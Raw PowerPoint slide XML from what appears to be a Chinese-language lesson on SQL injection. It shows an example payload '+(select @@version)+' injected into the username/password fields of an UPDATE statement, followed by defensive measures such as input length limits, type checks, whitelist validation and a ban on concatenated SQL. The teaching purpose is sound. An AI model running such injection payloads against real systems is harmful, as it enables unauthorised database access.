              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="254"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="506730" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>对该</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>语句进行注入就需要闭合单引</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>号</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，可以</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="45">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>处插入语句</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>'+(select  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>@@version)+',</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>最终执行的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>语句</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr sz="500">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="506095" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="195"/>
              </a:spcBef>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="506730" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>update</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>person</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set</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>username='username',set</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>password=''+(select</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>@@version)+''</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="500" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>id=l</a:t>
            </a:r>
            <a:endParaRPr sz="500">
              <a:latin typeface="Franklin Gothic Book"/>
              <a:cs typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>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621993"/>
            <a:ext cx="161544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SQ</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>注入的防范措施</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2970155" y="2110039"/>
            <a:ext cx="638175" cy="239395"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="1270" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="71120">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="15" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>p_</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="15" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>cu</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="15" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>sq</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>句。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3093605" y="2092325"/>
            <a:ext cx="2039873" cy="752094"/>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1262767" y="871890"/>
            <a:ext cx="3395345" cy="1990725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="29209" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="151130" marR="17780" indent="-139065">
              <a:lnSpc>
                <a:spcPts val="690"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="229"/>
              </a:spcBef>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>注入攻击的风险最终落脚于用户可以控制输入</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>注入、</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>、文件包含、命令 执行等风险都可归于此。</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="330"/>
              </a:spcBef>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>前端页面部分</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" marR="14604" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="81800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="265"/>
              </a:spcBef>
              <a:buSzPct val="92857"/>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="342265" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>最小输入原则。限定输入长度，根据预期情况限定参数最大长度，浏览器限定 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>字符长度最大为</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="15" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>2083</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>字节（微软</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Internet</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="50" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Explorer</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>），</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>实际可使用的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>长度 为</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="15" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>2048</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>字节。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
              <a:buSzPct val="92857"/>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="342265" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>限定输入类型。如整型只能输入整型。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" marR="5080" indent="-138430">
              <a:lnSpc>
                <a:spcPts val="690"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="250"/>
              </a:spcBef>
              <a:buSzPct val="92857"/>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="342265" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>只能输入合法数据。拒绝所有其他数据正则表达式，客户端与服务器端必须都做 验证。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>数据库部分</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="115"/>
              </a:spcBef>
              <a:buSzPct val="92857"/>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="342265" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>不允许在代码中出现直接拼接</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="15" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>语句的情况。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="341630" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
              <a:buSzPct val="92857"/>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="342265" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>存储过程中不允许出现</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
